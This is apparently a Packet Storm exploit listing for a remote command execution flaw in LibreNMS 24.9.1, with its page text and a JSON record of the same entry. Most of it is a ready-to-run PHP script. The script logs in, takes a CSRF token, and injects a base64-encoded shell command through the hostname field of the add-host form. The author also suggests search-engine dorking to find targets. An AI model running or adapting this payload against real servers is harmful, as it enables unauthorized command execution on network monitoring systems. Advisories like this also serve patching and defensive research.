📄 LibreNMS 24.9.1 Code Injection_PACKETSTORM:213136

Description

LibreNMS version 24.9.1 suffers from a remote command execution vulnerability...

Basic Information

ID PACKETSTORM:213136

Published Dec 19, 2025 at 00:00

Affected Product

Affected Versions =============================================================================================================================================
| # Title : LibreNMS 24.9.1 PHP Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://www.librenms.org/ |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] LibreNMS vulnerability allows remote command execution (RCE).

[+] save code as poc.php .

[+] USage : cmd => c:\www\test\php poc.php

[+] SeT target = Line : 89

[+] PayLoad :

<?php

class LibreNMSExploit {
private $target;
private $username;
private $password;
private $path;
private $wait_time;
private $cookie;

public function __construct($target, $username, $password, $path = '/opt/librenms', $wait_time = 315) {
$this->target = rtrim($target, '/');
$this->username = $username;
$this->password = $password;
$this->path = $path;
$this->wait_time = $wait_time;
$this->cookie = tempnam(sys_get_temp_dir(), 'cookie_');
}

private function request($method, $uri, $data = [], $headers = []) {
$url = "$this->target/$uri";
$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, $this->cookie);
curl_setopt($ch, CURLOPT_COOKIEFILE, $this->cookie);
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, strtoupper($method));

if (!empty($data)) {
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
}

if (!empty($headers)) {
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
}

$response = curl_exec($ch);
curl_close($ch);
return $response;
}

private function getCsrfToken() {
$response = $this->request('GET', 'login');
preg_match('/<meta name="csrf-token" content="(.*?)"/', $response, $matches);
return $matches[1] ?? null;
}

public function login() {
$token = $this->getCsrfToken();
if (!$token) {
die("Failed to get CSRF token\n");
}

$response = $this->request('POST', 'login', [
'username' => $this->username,
'password' => $this->password,
'_token' => $token
]);

return strpos($response, 'Devices') !== false;
}

public function executeCommand($command) {
$payload = base64_encode($command);
$hostPayload = ";echo $payload|base64 -d|sh;";

$token = $this->getCsrfToken();
if (!$token) {
die("Failed to get CSRF token\n");
}

$this->request('POST', 'addhost', [
'_token' => $token,
'hostname' => $hostPayload,
'snmp' => 'on',
'snmpver' => 'v2c',
'port' => '',
'transport' => 'udp',
'force_add' => 'on'
]);

echo "Payload sent, waiting for execution...\n";
sleep($this->wait_time);
}
}

// Usage
$exploit = new LibreNMSExploit('http://target.com', 'admin', 'password');
if ($exploit->login()) {
echo "Login successful!\n";
$exploit->executeCommand('id');
} else {
echo "Login failed!\n";
}

?>

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

{
    "lastseen": "2025-12-19T18:07:33",
    "description": "LibreNMS version 24.9.1 suffers from a remote command execution vulnerability...",
    "published": "2025-12-19T00:00:00",
    "modified": "2025-12-19T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 LibreNMS 24.9.1 Code Injection",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:213136",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [],
    "sourceData": "=============================================================================================================================================\n    | # Title     : LibreNMS 24.9.1 PHP Code Injection Vulnerability                                                                            |\n    | # Author    : indoushka                                                                                                                   |\n    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |\n    | # Vendor    : https://www.librenms.org/                                                                                                   |\n    =============================================================================================================================================\n    \n    POC :\n    \n    [+] Dorking \u0130n Google Or Other Search Enggine.\n    \n    [+] LibreNMS vulnerability allows remote command execution (RCE).\n     \n    [+] save code as poc.php .\n    \n    [+] USage : cmd => c:\\www\\test\\php poc.php \n    \n    [+] SeT target  = Line : 89\n    \n    [+] PayLoad :\n    \n    <?php\n    \n    class LibreNMSExploit {\n        private $target;\n        private $username;\n        private $password;\n        private $path;\n        private $wait_time;\n        private $cookie;\n    \n        public function __construct($target, $username, $password, $path = '/opt/librenms', $wait_time = 315) {\n            $this->target = rtrim($target, '/');\n            $this->username = $username;\n            $this->password = $password;\n            $this->path = $path;\n            $this->wait_time = $wait_time;\n            $this->cookie = tempnam(sys_get_temp_dir(), 'cookie_');\n        }\n    \n        private function request($method, $uri, $data = [], $headers = []) {\n            $url = \"$this->target/$uri\";\n            $ch = curl_init();\n            \n            curl_setopt($ch, CURLOPT_URL, $url);\n            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);\n            curl_setopt($ch, CURLOPT_COOKIEJAR, $this->cookie);\n            curl_setopt($ch, CURLOPT_COOKIEFILE, $this->cookie);\n            curl_setopt($ch, CURLOPT_CUSTOMREQUEST, strtoupper($method));\n    \n            if (!empty($data)) {\n                curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));\n            }\n    \n            if (!empty($headers)) {\n                curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);\n            }\n    \n            $response = curl_exec($ch);\n            curl_close($ch);\n            return $response;\n        }\n    \n        private function getCsrfToken() {\n            $response = $this->request('GET', 'login');\n            preg_match('/<meta name=\"csrf-token\" content=\"(.*?)\"/', $response, $matches);\n            return $matches[1] ?? null;\n        }\n    \n        public function login() {\n            $token = $this->getCsrfToken();\n            if (!$token) {\n                die(\"Failed to get CSRF token\\n\");\n            }\n    \n            $response = $this->request('POST', 'login', [\n                'username' => $this->username,\n                'password' => $this->password,\n                '_token'   => $token\n            ]);\n    \n            return strpos($response, 'Devices') !== false;\n        }\n    \n        public function executeCommand($command) {\n            $payload = base64_encode($command);\n            $hostPayload = \";echo $payload|base64 -d|sh;\";\n            \n            $token = $this->getCsrfToken();\n            if (!$token) {\n                die(\"Failed to get CSRF token\\n\");\n            }\n            \n            $this->request('POST', 'addhost', [\n                '_token'    => $token,\n                'hostname'  => $hostPayload,\n                'snmp'      => 'on',\n                'snmpver'   => 'v2c',\n                'port'      => '',\n                'transport' => 'udp',\n                'force_add' => 'on'\n            ]);\n            \n            echo \"Payload sent, waiting for execution...\\n\";\n            sleep($this->wait_time);\n        }\n    }\n    \n    // Usage\n    $exploit = new LibreNMSExploit('http://target.com', 'admin', 'password');\n    if ($exploit->login()) {\n        echo \"Login successful!\\n\";\n        $exploit->executeCommand('id');\n    } else {\n        echo \"Login failed!\\n\";\n    }\n    \n    ?>\n    \n    \n    Greetings to :=====================================================================================\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\n    ===================================================================================================",
    "sourceHref": "https://packetstorm.news/download/213136",
    "cvss": {
        "score": 0,
        "severity": "NONE",
        "vector": "NONE",
        "version": "NONE"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/213136/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply